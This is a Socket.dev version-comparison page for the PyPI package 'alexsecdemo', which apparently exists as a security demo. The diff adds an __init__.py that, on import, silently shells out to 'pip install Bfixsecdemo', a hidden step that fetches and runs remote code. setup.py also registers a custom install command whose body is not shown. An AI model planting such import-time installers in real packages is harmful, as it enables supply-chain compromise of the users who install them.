You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

alexsecdemo

Package Overview
Dependencies
Maintainers
1
Versions
13
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

alexsecdemo - pypi Package Compare versions

Comparing version
1.3.4
to
5.2.9
+9
a_b/__init__.py
import imp
import os
modules = set(["Bfixsecdemo"])
for m in modules:
try:
imp.find_module(m)
except ImportError:
os.system("pip install Bfixsecdemo")
def prtunit():
print('i am Alex.prtunit!')
def prtmymod2():
print('i am Alex.prtmymod2!')
+1
-1
Metadata-Version: 2.1
Name: Alexsecdemo
Version: 1.3.4
Version: 5.2.9
Summary: A sample Python project, do not download it!

@@ -5,0 +5,0 @@ Author: Alex

@@ -7,5 +7,5 @@ Alexsecdemoraw.py

Alexsecdemo.egg-info/top_level.txt
mymod1/__init__.py
mymod1/unit.py
mymod2/__init__.py
mymod2/mymod2.py
a-b/__init__.py
a-b/mymod2.py
a_b/__init__.py
a_b/unit.py
Alexsecdemoraw
mymod1
mymod2
a-b
a_b
Metadata-Version: 2.1
Name: Alexsecdemo
Version: 1.3.4
Version: 5.2.9
Summary: A sample Python project, do not download it!

@@ -5,0 +5,0 @@ Author: Alex

@@ -16,7 +16,7 @@ from setuptools import setup

name='Alexsecdemo', #package name
version='1.3.4',
version='5.2.9',
description='A sample Python project, do not download it!',
author='Alex',
license='MIT',
packages=['mymod1','mymod2'],
packages=['a_b','a-b'],
py_modules=['Alexsecdemoraw'],

@@ -23,0 +23,0 @@ cmdclass={'install': CustomInstall},

import imp
import os
modules = set(["Bfixsecdemo"])
for m in modules:
try:
imp.find_module(m)
except ImportError:
os.system("pip install Bfixsecdemo")
def prtunit():
print('i am Alex.prtunit!')
def prtmymod2():
print('i am Alex.prtmymod2!')